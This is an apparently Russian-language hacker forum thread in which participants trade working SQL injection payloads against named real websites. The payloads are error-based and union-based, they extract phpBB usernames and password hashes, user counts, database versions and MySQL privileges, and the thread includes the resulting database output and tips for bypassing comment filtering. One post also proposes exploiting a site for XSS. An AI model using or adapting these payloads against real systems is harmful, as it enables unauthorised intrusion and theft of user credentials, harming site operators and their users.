Так не убеждаются, убеждаются так: Code: http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+phpbb_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Code: Duplicate entry '[COLOR=Green]1566699[/COLOR]' for key 'group_key' [1062] 1566699 пользователей. Code: http://torrnado.ru/peerlist.php?id=982+and(select+1+from(select+count(*),concat((select+concat(count(*),0x00)+from+xbt_users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f Code: Duplicate entry '[COLOR=Green]1567844[/COLOR]' for key 'group_key' [1062] 1567844 пользователей. А вот и вывод: Code: http://torrnado.ru/peerlist.php?id=982+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,username,user_password),1,100)+from+phpbb_users+limit+1,1),@:=@-1)having+@||min(@:=0)--+f ...
ну так я же и написал отсюда torrent:xbt_users:1567810 torrenthpbb_users:1551912 чё ето за чудо конструкция такая? (@:=1)||@ где в муналах по sql я про неё могу почитать
http://www.scientific-work.ru/index.php?id=303+union+select+1,2,3,4,5,6,7,8,9,10--+ тут не пойму как данные вывести что не подставлю лимит или - пишет что не такой страници и тут тоже http://www.ivrus.biz/showcat.php?id=7+union+select+version%28%29,version%28%29,version%28%29--+
http://www.scientific-work.ru/index.php?id=-303+union+select+1,2,3,4,5,6,7,version(),0x1,10--+ Вот так. Данные при редиректе в строке URL.
Вывода нет походу: http://www.ivrus.biz/showcat.php?id=7-9999999.9+union+select+user(),user(),user()--+f Но за то, можно заюзать как XSS.
Друзья! Не забываем про внимательность и настойчивось. ПРОФИТ: http://www.ivrus.biz/showphoto.php?fid=6&pid=4&id=-1+union+select+1,2,3,user(),5,6,7--+ А вообще вот так: http://www.ivrus.biz/showcat.php?id=7+union+select+1,2,3+from+mysql.user--+ можно понять что пользователь mysql имеет какие-то более-менее значимые привилегии в данном случае 'в слепую'.
I need help on this one. Code: http://allbahrain.com/list_resturant_menu.php?resturant=1 Tried so many synthax, maybe it's tricky.
хм.. действительно так не http://baratro.ru/subcat.php?id=22%27+and%28select+1+from%28select+count%28*%29,concat%28%28select+table_name+from+information_schema.tables+limit+0,1%29,0x00,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--+ так тоже http://baratro.ru/subcat.php?id=22%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+ о, так пашет http://baratro.ru/subcat.php?id=22'+or+(@:=1)||@+group+by+concat((select+version()),@:=@-1)having+@||min(@:=0)--+f блин, чёт не пойму, @:=1 там между собакой и двоеточием должно быть имя переменной которой присваиваем еденицу, как ето конструкция ваще ваызывает вывоод?
Зачем использование переменных? Вот все выводит: http://baratro.ru//subcat.php?id=22'or(1)+group+by+concat(version(),floor(rand(0)*2))having(min(0))or(1)and' Твой запрос не работает из-за комментария: http://baratro.ru/subcat.php?id=22'and(select+1+from(select+count(*),concat((select+concat(version(),0x3a)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and' Вместо and', тот, что на конце можно использовать 100500 вариантов: -- a and' and'1'='1 %23 И т.д...
Привет Подскажите как раскрутить скулю если я не могу оборвать запрос стандартными --+ + так и выводится в ошибке как плюс Пробовал /**/ - режется %09...%20 и т.д. так-же выводятся в ошибке как есть PHP: SELECT * FROM users WHERE link = 'admin'--+' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Не прокатывает. PHP: SELECT * FROM users WHERE link = 'admin'+and+1='1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+1='1'' at line 1
